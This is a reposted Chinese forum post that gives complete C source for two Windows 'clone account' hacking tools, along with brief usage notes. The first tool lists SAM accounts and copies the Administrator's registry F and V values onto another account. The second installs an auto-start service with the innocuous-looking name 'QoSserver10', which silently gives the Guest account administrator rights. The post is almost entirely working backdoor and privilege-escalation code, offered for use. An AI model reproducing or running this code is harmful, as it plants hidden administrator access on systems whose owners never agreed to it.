[转载]用C实现克隆帐号的程序原代码
信息来源:中国暗域网络老贴用法:
编辑好后,需要自己用regedt32把SAM键及其子键设置为administrator可以访问才能使用
[code]#include <windows.h>
#include <stdio.h>
char name[50][30];//这些是Open函数里的
int openN=0;
#pragma hdrstop
//---------------------------------------------------------------------------
#pragma argsused
//---------------------------------------------------------------------------
// Open
// 打开一个键
//---------------------------------------------------------------------------
void Open(char *set)
{
int i=0;
HKEY hkey;
DWORD dwlndex=0,cbname=100,ret=0;
char temp[100],szBuff[100];
FILETIME ftlastwt;
ZeroMemory(szBuff,100);
ZeroMemory(temp,100);
ZeroMemory(name,1500);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
set,
0,
KEY_ALL_ACCESS,
&hkey);
for( i=0 ; ret==ERROR_SUCCESS ; i++, dwlndex++ )
{
ret = RegEnumKeyEx( hkey,
dwlndex,
temp,
&cbname,
NULL,
NULL,
NULL,
&ftlastwt
);
strcat(name[i],temp);
ZeroMemory(temp,100);
cbname=100;
}
RegCloseKey(hkey);
for(openN=0;openN<i;openN++)
{
strcat(szBuff,name[openN]);
strcat(szBuff,"\n\r");
}
printf("%s",szBuff);
return ;
}
//---------------------------------------------------------------------------
// ViewType
// test
//---------------------------------------------------------------------------
ViewType(char *set)
{
HKEY hkey;
DWORD Type=0,ret;
char szBuff[10];
ret= RegOpenKeyEx(HKEY_LOCAL_MACHINE,
set,
0,
KEY_ALL_ACCESS,
&hkey);
if(ret==ERROR_SUCCESS) ;
else
{
printf("open key FAIL\n\r");
return 0;
}
RegQueryValueEx( hkey, // handle to key
NULL, // value name,要查寻默认值的话,键名就是NULL
NULL, // reserved
&Type, // type buffer
NULL, // data buffer
NULL // size of data buffer
);
wsprintf(szBuff,"%X\n\r",Type);
printf("%s",szBuff);
return 1;
}
//---------------------------------------------------------------------------
// ListUser
// 列出本机所有的用户名和RID标识符
//---------------------------------------------------------------------------
ListUser()
{
char szBuff[70]="SAM\\SAM\\Domains\\Account\\Users\\Names\\";
char szTemp[40]={'\0'};
Open("SAM\\SAM\\Domains\\Account\\Users\\Names");
for(int n=0;n<openN;n++)
{
strcat(szBuff,name[n]);
wsprintf(szTemp,name[n]);
strcat(szTemp,"--->");
printf("%s",szTemp);
ViewType(szBuff);
strcpy(szBuff,"SAM\\SAM\\Domains\\Account\\Users\\Names\\");
}
return 1;
}
//---------------------------------------------------------------------------
// Clone
// 克隆帐号
//---------------------------------------------------------------------------
int Clone(char *user)
{
HKEY hkeyRoot,hkeyUser;
char CloneUserKey[100];
DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret;
LPBYTE lpDataF,lpDataV;
lpDataF = (LPBYTE) malloc(1024*2);
lpDataV = (LPBYTE) malloc(1024*10);
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
ZeroMemory(CloneUserKey,100);
strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000");
strcat(CloneUserKey,user);
ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE,
"SAM\\SAM\\Domains\\Account\\Users\\000001F4",
0,
KEY_ALL_ACCESS,
&hkeyRoot);
if(ret==ERROR_SUCCESS) ;
else
{
printf("open key FAIL\n\r");
return 0;
}
ret = RegQueryValueEx( hkeyRoot, // handle to key
"F", // value name
NULL, // reserved
&Type, // type buffer
lpDataF, // data buffer
&sizeF // size of data buffer
);
if(ret==ERROR_SUCCESS) ;
else
{
printf("Query key FAIL\n\r");
return 0;
}
ret = RegQueryValueEx( hkeyRoot, // handle to key
"V", // value name
NULL, // reserved
&Type, // type buffer
lpDataV, // data buffer
&sizeV // size of data buffer
);
if(ret==ERROR_SUCCESS) ;
else
{
printf("Query key FAIL\n\r");
return 0;
}
ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE,
CloneUserKey,
0,
KEY_ALL_ACCESS,
&hkeyUser);
if(ret==ERROR_SUCCESS) ;
else
{
printf("open key FAIL\n\r");
return 0;
}
ret= RegSetValueEx( hkeyUser,
"F",
0,
REG_BINARY,
lpDataF,
sizeF);
if(ret==ERROR_SUCCESS) ;
else
{
printf("set key FAIL\n\r");
return 0;
}
ret= RegSetValueEx( hkeyUser,
"V",
0,
REG_BINARY,
lpDataV,
sizeV);
if(ret==ERROR_SUCCESS) ;
else
{
printf("set key FAIL\n\r");
return 0;
}
if(ret==ERROR_SUCCESS)
printf("clone SUCCESS\n\r");
else
{
printf("clone FAIL\n\r");
return 0;
}
RegCloseKey(hkeyRoot);
RegCloseKey(hkeyUser);
return 1;
}
//---------------------------------------------------------------------------
// main()
// 主调函数
//---------------------------------------------------------------------------
int main()
{
char command[20]={'\0'};
char temp[5]={'\0'};
printf("\n=*=Clone Account Ver0.01 Code By NOIR=*=\n\n");
while(1)
{
printf("please enter the command:");
gets(command);
if( (strcmp(command,"listuser"))==0 )
ListUser();
if( (strncmp(command,"clone",5))==0 )
{
strcpy(temp,command+6);
Clone(temp);
}
if( (strcmp(command,"exit")==0) )
exit(0);
}
}[/code]
用法:
先在命令行下输入"Ex-Service install",安装服务.
再在服务管理器里启动名为QoSserver的服务,一旦启动会将Guest帐号克隆为administrator
[code]#include <windows.h>
#include <stdio.h>
void WINAPI KServiceMain(DWORD argc, LPTSTR * argv);
void InstallService(const char * szServiceName);
int Clone(char *user);
int main(int argc, char * argv[])
{
if ((argc==2) && (::strcmp(argv[1], "install")==0))
{
InstallService("QoSserver10");
return 0;
}
SERVICE_TABLE_ENTRY service_table_entry[] ={
{ "QoSserver10",//后台服务线程的名称
KServiceMain },//后台服务线程入口点
{ NULL,
NULL }//标志表的结束
};//定义了两个SERVICE_TABLE_ENTRY结构数组
StartServiceCtrlDispatcher(service_table_entry);//指明一个服务的主线程
return 0;
}
SERVICE_STATUS servicestatus;
SERVICE_STATUS_HANDLE servicestatushandle;
void InstallService(const char * szServiceName)
{
SC_HANDLE hService=0,handle=0;
handle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (handle!=NULL)
{
char szFilename[256];
GetModuleFileName(NULL, szFilename, 255);
hService = CreateService( handle,
szServiceName,
szServiceName,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szFilename,
NULL,
NULL,
NULL,
NULL,
NULL );
}
CloseServiceHandle(hService);
CloseServiceHandle(handle);
}
void WINAPI ServiceCtrlHandler(DWORD dwControl)
{
switch (dwControl)
{
case SERVICE_CONTROL_PAUSE:
servicestatus.dwCurrentState = SERVICE_PAUSE_PENDING;
SetServiceStatus(servicestatushandle, &servicestatus);
servicestatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
servicestatus.dwCurrentState = SERVICE_CONTINUE_PENDING;
SetServiceStatus(servicestatushandle, &servicestatus);
servicestatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
servicestatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus(servicestatushandle, &servicestatus);
servicestatus.dwCurrentState = SERVICE_STOPPED;
break;
case SERVICE_CONTROL_SHUTDOWN:
break;
case SERVICE_CONTROL_INTERROGATE:
servicestatus.dwCurrentState = SERVICE_RUNNING;
break;
}
SetServiceStatus(servicestatushandle, &servicestatus);
}
void WINAPI KServiceMain(DWORD argc, LPTSTR * argv)
{
//注册服务控制处理函数
bool bInitialized = true;
servicestatushandle =::RegisterServiceCtrlHandler("QoSserver10", ServiceCtrlHandler);
if (servicestatushandle == (SERVICE_STATUS_HANDLE)0)
return;
servicestatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
servicestatus.dwCurrentState = SERVICE_START_PENDING;
servicestatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;//表明Service目前能接受的命令是SERVICE_CONTROL_STOP 标志
servicestatus.dwWin32ExitCode = 0;
servicestatus.dwServiceSpecificExitCode = 0;
servicestatus.dwCheckPoint = 0;
servicestatus.dwWaitHint = 0;
SetServiceStatus(servicestatushandle, &servicestatus);//必须随时更新数据库中Service的状态。
servicestatus.dwCheckPoint = 0;
servicestatus.dwWaitHint = 0;
Clone("406");
if (!bInitialized)
{
servicestatus.dwCurrentState = SERVICE_STOPPED;
servicestatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR;
servicestatus.dwServiceSpecificExitCode = 1;
}
else
{
servicestatus.dwCurrentState = SERVICE_RUNNING;
}
SetServiceStatus(servicestatushandle, &servicestatus);
return;
}
int Clone(char *user)
{
HKEY hkeyRoot,hkeyUser;
char CloneUserKey[100];
DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret;
LPBYTE lpDataF,lpDataV;
lpDataF = (LPBYTE) malloc(1024*2);
lpDataV = (LPBYTE) malloc(1024*10);
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
ZeroMemory(CloneUserKey,100);
strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000");
strcat(CloneUserKey,user);
ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE,
"SAM\\SAM\\Domains\\Account\\Users\\000001F4",
0,
KEY_ALL_ACCESS,
&hkeyRoot);
if(ret==ERROR_SUCCESS) ;
else
{
printf("open key FAIL\n\r");
return 0;
}
ret = RegQueryValueEx( hkeyRoot,
"F",
NULL,
&Type,
lpDataF,
&sizeF
);
if(ret==ERROR_SUCCESS) ;
else
{
printf("Query key FAIL\n\r");
return 0;
}
ret = RegQueryValueEx( hkeyRoot,
"V",
NULL,
&Type,
lpDataV,
&sizeV
);
if(ret==ERROR_SUCCESS) ;
else
{
printf("Query key FAIL\n\r");
return 0;
}
ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE,
CloneUserKey,
0,
KEY_ALL_ACCESS,
&hkeyUser);
if(ret==ERROR_SUCCESS) ;
else
{
printf("open key FAIL\n\r");
return 0;
}
ret= RegSetValueEx( hkeyUser,
"F",
0,
REG_BINARY,
lpDataF,
sizeF);
if(ret==ERROR_SUCCESS) ;
else
{
printf("set key FAIL\n\r");
return 0;
}
ret= RegSetValueEx( hkeyUser,
"V",
0,
REG_BINARY,
lpDataV,
sizeV);
if(ret==ERROR_SUCCESS) ;
else
{
printf("set key FAIL\n\r");
return 0;
}
if(ret==ERROR_SUCCESS)
printf("clone SUCCESS\n\r");
else
{
printf("clone FAIL\n\r");
return 0;
}
RegCloseKey(hkeyRoot);
RegCloseKey(hkeyUser);
return 1;
}[/code]
页:
[1]